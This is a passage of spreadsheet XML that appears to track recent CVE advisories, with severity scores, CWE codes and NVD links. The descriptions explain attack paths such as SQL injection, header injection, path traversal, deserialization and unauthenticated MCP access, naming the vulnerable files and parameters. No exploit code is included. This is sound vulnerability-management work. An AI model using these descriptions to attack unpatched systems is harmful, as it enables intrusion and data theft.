          <t>CWE-407</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>Inefficient Algorithmic Complexity vulnerability in team-alembic AshAuthentication allows an unauthenticated attacker to exhaust CPU and memory via an oversized base62 segment in a submitted API key.
AshAuthentication.Base.decode62/1 in lib/ash_authentication/base.ex splits its argument into one binary per character and folds it with charval62/2, which recomputes Integer.pow(62, index) at every position instead of accumulating by Horner's method, so cost grows roughly cubically in the input length. bindecode62/1 in the same module is quadratic through Integer.undigits/2 and Integer.digits/2. Neither function caps byte_size/1, and AshAuthentication.Strategy.ApiKey.SignInPreparation passes the underscore-separated segments of the submitted key straight into both, before any key lookup and without prior authentication. The surrounding rescue clauses catch exceptions, not CPU or memory exhaustion.
This issue affects ash_authentication: from 4.8.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82760</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85077</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-113</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>Sanic is an opensource python web server/framework. Prior to version 24.12.1, and in version 25.12.0, the HTTP/1.1 response pipeline in sanic/response/types.py serializes response header names and values without rejecting carriage-return or line-feed characters. Applications that place attacker-controlled data in response.headers, file(..., filename=...), or cookie path and domain attributes can therefore emit injected headers and may split responses. Depending on application and proxy behavior, this can enable session fixation through injected cookies, cache poisoning, or security-header corruption. This issue is fixed in versions 24.12.1 and 25.12.1.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85077</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86039</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr">
        <is>
          <t>npm:@libp2p/peer-store</t>
        </is>
      </c>
      <c r="M124" s="5" t="inlineStr">
        <is>
          <t>12.0.24</t>
        </is>
      </c>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-345</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. From 8.0.0 until 12.0.24, @libp2p/peer-store in packages/peer-store/src/index.ts uses consumePeerRecord to verify a RecordEnvelope signature but does not require PeerRecord.peerId in the signed payload to equal the signer peer ID derived by RecordEnvelope.openAndCertify. The expectedPeer option checks only the envelope signer, and the gossipsub Peer Exchange path can provide the attacker's own peer ID as expectedPeer. An attacker can therefore sign a record with the attacker's key, place a victim peer ID and attacker-controlled multiaddrs in the payload, and have certified addresses stored for the victim. The poisoned addresses can cause address-book corruption, dial redirection or failure, routing manipulation, and reachability disruption, although the connection upgrade still verifies remote peer identity and prevents a complete identity takeover. The issue is fixed in version 12.0.24.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86039</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92903</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>412d305a-227d-44f9-a262-a31ba44f2aea</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Snowflake CLI versions prior to 3.27.0 allowed unsanitized user-controlled values to be interpolated into SQL strings that are executed as multi-statement queries. An attacker who is able to supply a malicious project configuration file or craft command-line input can cause Snowflake CLI to execute attacker-controlled SQL statements in the context of the victim's Snowflake session and active role. Successful exploitation requires either write or pull-request access to a project repository whose CI/CD pipeline runs Snowflake CLI under an elevated service account role, or the ability to supply untrusted input to CLI-wrapping automation. Impact is limited by the privileges held by the configured Snowflake role at execution time. The fix is available in Snowflake CLI version 3.27.0, which also addresses several additional security findings. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92903</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26950</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>Dell SmartFabric Manager, versions prior to 2.2.1, contains an Insufficient Verification of Data Authenticity vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26950</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54446</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>NetLicensing MCP Server is a natural-language interface that enables agentic applications to manage the software-licensing lifecycle in Labs64 NetLicensing. Prior to 0.1.6, network-reachable HTTP transport requests to /mcp that omit x-netlicensing-api-key, Authorization: Bearer, and the apikey query parameter pass through ApiKeyMiddleware in src/netlicensing_mcp/server.py without authentication. The downstream api_key_ctx in src/netlicensing_mcp/client.py then falls back to the operator's NETLICENSING_API_KEY and authenticates upstream NetLicensing REST API calls under the operator account. An unauthenticated attacker can invoke MCP tools to enumerate products, licenses, licensees, and transactions, create or modify licensing objects, perform validations, and execute destructive delete operations. The issue affects HTTP deployments configured with a server-side key and does not require user interaction. This issue is fixed in version 0.1.6.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54446</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54520</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>AI Agent Automation is a modular AI agent workflow automation platform with schedulers, tools, and observability. Prior to 0.9.1, the executeStep file-step implementation in backend/src/agents/executor.js passes the user-controlled step.path value through path.resolve with process.cwd() and then uses the resulting path for read or write operations without checking that it remains in an approved workflow directory. An authenticated user who can create or modify workflow file steps can supply traversal segments to escape the intended workspace and read sensitive files or write and overwrite files accessible to the backend process, including application-adjacent files when process permissions allow. This issue is fixed in version 0.9.1.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54520</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54596</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>ITFlow provides an IT documentation, ticketing and accounting system for small managed service providers. Prior to version 26.07, an authenticated Technician or higher with access to at least one client invoice can inject SQL through the frequency parameter handled by agent/post/recurring_invoice.php. The handler passes recurring_invoice_frequency through sanitizeInput but interpolates it unquoted into DATE_ADD, allowing SQL syntax to escape the interval expression, assign additional INSERT columns, store subquery results in recurring_invoice_note, and expose those results through agent/recurring_invoice.php. The persisted recurring_invoice_frequency can execute again when Force Recurring uses it in a later UPDATE, allowing another legitimate user to trigger the second-order injection. This can expose password hashes, SMTP credentials, user records, and database metadata, modify database fields, and enable administrative takeover after credential cracking. This issue is fixed in version 26.07.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54596</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76834</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>b2evolution CMS versions 6.7.8 through 7.2.5 contain an incomplete fix for CVE-2016-8901 where the serialized-array object check in param_check_serialized_array() fails to reject payloads with negative integer array keys. Unauthenticated attackers can submit crafted serialized PHP objects via POST requests to htsrv/call_plugin.php that bypass validation and reach unserialize(), instantiating arbitrary PHP objects with attacker-chosen properties that may enable code execution if suitable POP gadget chains exist.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76834</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81442</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Privilege Management vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information tampering and Unauthorized access.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81442</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81475</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Missing Authentication for Critical Function vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Remote execution.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81475</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81476</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Remote execution.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81476</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81478</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Use of Hard-coded Cryptographic Key vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81478</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87935</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>The Paid Downloads plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 3.15 via the admin_request_handler function. This is due to missing authorization and file type validation in the admin_request_handler function, which is reachable unauthenticated via is_admin() returning true for /wp-admin/admin-post.php. This makes it possible for unauthenticated attackers to upload files that may be executable, which makes remote code execution possible. On Apache servers where AllowOverride is enabled, an .htaccess file placed in the upload directory may block direct HTTP retrieval of uploaded files, limiting exploitability to stacks that do not honor .htaccess directives such as nginx, LiteSpeed, and Apache with AllowOverride None.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87935</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92984</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>HUBzero CMS through 2.2.32 accepts session identifiers from query strings and request variables instead of cookies alone, allowing unauthenticated attackers to fixate victim sessions. Attackers can obtain a valid session identifier, send victims a crafted link containing it, and replay the identifier after the victim authenticates to hijack their account and access.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92984</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78428</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
